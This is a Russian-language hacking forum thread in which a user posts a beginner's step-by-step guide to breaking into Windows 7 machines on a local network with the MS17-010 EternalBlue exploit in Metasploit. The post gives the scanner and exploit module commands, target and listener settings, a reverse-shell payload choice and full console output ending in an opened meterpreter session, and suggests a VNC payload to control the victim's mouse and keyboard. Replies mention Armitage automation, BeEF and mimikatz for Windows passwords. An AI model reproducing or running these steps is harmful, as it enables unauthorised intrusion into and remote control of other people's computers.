Взлом Windows 7 удалённо без социальной инженерии

Discussion in 'Песочница' started by Dr_Wile, 2 Nov 2017.

  1. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    121
    Likes Received:
    52
    Reputations:
    2
    Здравствуйте уважаемые античатовцы, сегодня Вашему вниманию хочу представить относительно свежую багу в Windows 7 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption.

    Экстплоит под эту уязвимость уже вышел и Вы можете его найти в своём Metasploit, предварительно введя в консоли msfupdate (если Вы давно не обновляли фреймворк). С помощью сканера auxiliary/scanner/smb/smb_ms17_010 найдите в своей локалке машины, работающие на семёрке. После того, как вы задали диапазон адресов (set RHOSTS 192.168.0.2-254) выберите количество потоков (на Ваше усмотрение): set THREADS 50 , запустите сканер командой run.

    Сканер показал нам список хостов на которых имеется данная уязвимость, более того он показал какая именна винда работает на уязвимых машинах.

    Code:
    [+] 192.168.0.26:445      - Host is likely VULNERABLE to MS17-010!  (Windows 5.1)
    [+] 192.168.0.13:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
    [+] 192.168.0.29:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
    [+] 192.168.0.21:445      - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)
    [+] 192.168.0.19:445      - Host is likely VULNERABLE to MS17-010!  (Windows 5.1)
    [*] Scanned  50 of 253 hosts (19% complete)
    [*] Scanned  54 of 253 hosts (21% complete)
    [*] Scanned  95 of 253 hosts (37% complete)
    [*] Scanned 148 of 253 hosts (58% complete)
    [*] Scanned 177 of 253 hosts (69% complete)
    [*] Scanned 192 of 253 hosts (75% complete)
    [*] Scanned 196 of 253 hosts (77% complete)
    [-] 192.168.0.201:445     - Host does NOT appear vulnerable.
    [-] 192.168.0.210:445     - Host does NOT appear vulnerable.
    [*] Scanned 216 of 253 hosts (85% complete)
    [*] Scanned 229 of 253 hosts (90% complete)
    [*] Scanned 253 of 253 hosts (100% complete)
    [*] Auxiliary module execution completed
    
    Теперь настало время для эксплуатирования уязвымых хостов, введите в консоли Metasploit:

    use exploit/windows/smb/ms17_010_eternalblue

    Выберите IP адрес уязвимой машины, set RHOST 192.168.0.29 затем введите show payloads. Вы получите список полезных нагрузок, которые эксплоит может передать уязвимой машине:

    Code:
       generic/custom                                               normal  Custom Payload
       generic/shell_bind_tcp                                       normal  Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                                    normal  Generic Command Shell, Reverse TCP Inline
       windows/x64/exec                                             normal  Windows x64 Execute Command
       windows/x64/loadlibrary                                      normal  Windows x64 LoadLibrary Path
       windows/x64/meterpreter/bind_ipv6_tcp                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
       windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/meterpreter/bind_tcp                             normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
       windows/x64/meterpreter/bind_tcp_uuid                        normal  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/meterpreter/reverse_http                         normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/meterpreter/reverse_https                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/meterpreter/reverse_named_pipe                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
       windows/x64/meterpreter/reverse_tcp                          normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
       windows/x64/meterpreter/reverse_tcp_uuid                     normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/meterpreter/reverse_winhttp                      normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
       windows/x64/meterpreter/reverse_winhttps                     normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
       windows/x64/powershell_bind_tcp                              normal  Windows Interactive Powershell Session, Bind TCP
       windows/x64/powershell_reverse_tcp                           normal  Windows Interactive Powershell Session, Reverse TCP
       windows/x64/shell/bind_ipv6_tcp                              normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
       windows/x64/shell/bind_ipv6_tcp_uuid                         normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/shell/bind_tcp                                   normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
       windows/x64/shell/bind_tcp_uuid                              normal  Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/shell/reverse_tcp                                normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
       windows/x64/shell/reverse_tcp_uuid                           normal  Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/shell_bind_tcp                                   normal  Windows x64 Command Shell, Bind TCP Inline
       windows/x64/shell_reverse_tcp                                normal  Windows x64 Command Shell, Reverse TCP Inline
       windows/x64/vncinject/bind_ipv6_tcp                          normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
       windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/vncinject/bind_tcp                               normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
       windows/x64/vncinject/bind_tcp_uuid                          normal  Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/vncinject/reverse_http                           normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/vncinject/reverse_https                          normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/vncinject/reverse_tcp                            normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
       windows/x64/vncinject/reverse_tcp_uuid                       normal  Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/vncinject/reverse_winhttp                        normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
       windows/x64/vncinject/reverse_winhttps                       normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
    
    Выберите один из них, например всеми любимый meterpreter командой: set PAYLOAD windows/x64/meterpreter/reverse_tcp
    Командой set LHOST 192.168.0.66 введите IP адрес своей машины, после чего введите exploit.

    Code:
    [*] Started reverse TCP handler on 192.168.0.56:4444
    [*] 192.168.0.29:445 - Connecting to target for exploitation.
    [+] 192.168.0.29:445 - Connection established for exploitation.
    [+] 192.168.0.29:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 192.168.0.29:445 - CORE raw buffer dump (38 bytes)
    [*] 192.168.0.29:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
    [*] 192.168.0.29:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
    [*] 192.168.0.29:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1         
    [+] 192.168.0.29:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 192.168.0.29:445 - Trying exploit with 12 Groom Allocations.
    [*] 192.168.0.29:445 - Sending all but last fragment of exploit packet
    [*] 192.168.0.29:445 - Starting non-paged pool grooming
    [+] 192.168.0.29:445 - Sending SMBv2 buffers
    [+] 192.168.0.29:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 192.168.0.29:445 - Sending final SMBv2 buffers.
    [*] 192.168.0.29:445 - Sending last fragment of exploit packet!
    [*] 192.168.0.29:445 - Receiving response from exploit packet
    [+] 192.168.0.29:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 192.168.0.29:445 - Sending egg to corrupted connection.
    [*] 192.168.0.29:445 - Triggering free of corrupted buffer.
    [*] Sending stage (205379 bytes) to 192.168.0.29
    [*] Meterpreter session 1 opened (192.168.0.56:4444 -> 192.168.0.29:49548) at 2017-11-02 04:57:00 +0000
    [+] 192.168.0.29:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.0.29:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.0.29:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    meterpreter >
    
    Если всё прошло гладко, то Вы увидите текст написанный выше. Открыта сессия Meterpreter, это означает то, что Вы успешно взломали удалённый хост, работающий на Windows 7. Наигравшись с meterpreter, можете заюзать следующий пайлоад: windows/x64/vncinject/reverse_tcp Он позволяет открыть удалённый рабочий стол, а если ввести set ViewOnly false можно управляя мышью и клавиатурой жертвы творить всякие сатанинские вещи с окнами =).
    Успехов Вам, во всех начинаниях!!!

    P.S. Эта статья писалась новичком для новичков. Гуру, будьте снизходительны.
    P.S.S Кстати, Windows 7 Professional не получается скомпрометировать таким образом.
     
  2. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,055
    Likes Received:
    3,418
    Reputations:
    72
    Эту дыру уже " порюхали" обновлением и закрытием порта.
    Тоже самое можно сделать Армитажем без всякого танцев с бубном, а если поставить все скрипты, которые предлагает help Армитажа, то вообще все пойдет на автомате.
    Вплоть до Beef со своими зомби и мимкатз с паролями от винды.
     
    Gorev likes this.
  3. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    121
    Likes Received:
    52
    Reputations:
    2
    Танцев с бубнами? Не знаю как в Armitage (не юзал эту софтину(надо исправить это досадное недоразумение =) ), но в Metasploit это делается в три свиста. А что касается Beef, то это вещь для искушённых. В ней да, можно творить штуки по интереснее
     
    Grace917 likes this.
  4. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,055
    Likes Received:
    3,418
    Reputations:
    72
    В Армитаже все тоже самое, только не надо ничего писать и вбивать. А на скриптах вообще все автоматом делается, даже юзер и не понимает что и как. А так нормальная статья.
    Армитаж тот же Метасплоит только GUI.
     
    Grace917, Gorev and Dr_Wile like this.
  5. nikbim96

    nikbim96 Member

    Joined:
    16 Jan 2014
    Messages:
    115
    Likes Received:
    23
    Reputations:
    1

    Ну мало кто обновляет винду где ты видел что бы лицензию все брали. 100% у каждого тут присутствующего пиратки и не обновляются. Их и без эксплоита ломай не хочу они уже там по любому столько вирей себе на пихали. :D:D:D Что касается свежести уязвимости Microsoft Windows MS17-010 дак она вроде вообще из далекого 2016 года. Да и не только под 7 винду она а сразу под целую линейку окон Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT, Windows 10, Windows Server 2016... Кому интересно меры по устранение уязвимости у себя на компьютере тут прочесть можете.
     
  6. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,055
    Likes Received:
    3,418
    Reputations:
    72
    Согласен, что у всех присутствующих стоит пиратка, покупать конечно же никому и в голову не придет, но критические обновления ставят все.
    И с какого перепугу пиратская винда не обновляется? Вот о этом по подробнее это что-то новое.
     
  7. nikbim96

    nikbim96 Member

    Joined:
    16 Jan 2014
    Messages:
    115
    Likes Received:
    23
    Reputations:
    1
    Ну обычно по умолчанию они просто отключены, в большей части сборок, и что бы они обновлялись их нужно включить. Ну и в сервисах по обслуживанию, компьютерной техники за частую клиенты просят отключить их, ибо им это мешает по какой не будь причине или не хотят что бы с 7 на 10 обновился. Согласен что бы пропатчиться достаточно Driver Pak скачать и пропатчиться.
     
    Veil likes this.
Loading...